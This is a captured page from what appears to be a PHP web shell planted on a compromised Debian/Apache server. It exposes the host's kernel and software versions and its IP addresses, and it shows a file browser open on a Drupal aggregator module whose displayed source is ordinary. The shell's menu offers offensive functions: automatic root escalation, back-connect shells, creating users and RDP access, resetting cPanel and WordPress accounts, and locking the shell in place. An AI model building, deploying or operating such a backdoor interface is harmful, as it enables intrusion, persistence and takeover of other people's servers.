Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.137.177.204
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
aggregator /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
aggregator-feed-source.tpl.php
1.08
KB
-rw-r--r--
aggregator-item.tpl.php
1.27
KB
-rw-r--r--
aggregator-rtl.css
124
B
-rw-r--r--
aggregator-summary-item.tpl.ph...
715
B
-rw-r--r--
aggregator-summary-items.tpl.p...
652
B
-rw-r--r--
aggregator-wrapper.tpl.php
397
B
-rw-r--r--
aggregator.admin.inc
23.85
KB
-rw-r--r--
aggregator.api.php
7.21
KB
-rw-r--r--
aggregator.css
779
B
-rw-r--r--
aggregator.fetcher.inc
1.66
KB
-rw-r--r--
aggregator.info
380
B
-rw-r--r--
aggregator.install
9.64
KB
-rw-r--r--
aggregator.module
28
KB
-rw-r--r--
aggregator.pages.inc
19.4
KB
-rw-r--r--
aggregator.parser.inc
9.33
KB
-rw-r--r--
aggregator.processor.inc
7.88
KB
-rw-r--r--
aggregator.test
38.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aggregator.fetcher.inc
<?php /** * @file * Fetcher functions for the aggregator module. */ /** * Implements hook_aggregator_fetch_info(). */ function aggregator_aggregator_fetch_info() { return array( 'title' => t('Default fetcher'), 'description' => t('Downloads data from a URL using Drupal\'s HTTP request handler.'), ); } /** * Implements hook_aggregator_fetch(). */ function aggregator_aggregator_fetch($feed) { $feed->source_string = FALSE; // Generate conditional GET headers. $headers = array(); if ($feed->etag) { $headers['If-None-Match'] = $feed->etag; } if ($feed->modified) { $headers['If-Modified-Since'] = gmdate(DATE_RFC7231, $feed->modified); } // Request feed. $result = drupal_http_request($feed->url, array('headers' => $headers)); // Process HTTP response code. switch ($result->code) { case 304: break; case 301: $feed->url = $result->redirect_url; // Do not break here. case 200: case 302: case 307: if (!isset($result->data)) { $result->data = ''; } if (!isset($result->headers)) { $result->headers = array(); } $feed->source_string = $result->data; $feed->http_headers = $result->headers; break; default: watchdog('aggregator', 'The feed from %site seems to be broken, due to "%error".', array('%site' => $feed->title, '%error' => $result->code . ' ' . $result->error), WATCHDOG_WARNING); drupal_set_message(t('The feed from %site seems to be broken, because of error "%error".', array('%site' => $feed->title, '%error' => $result->code . ' ' . $result->error))); } return $feed->source_string === FALSE ? FALSE : TRUE; }
Close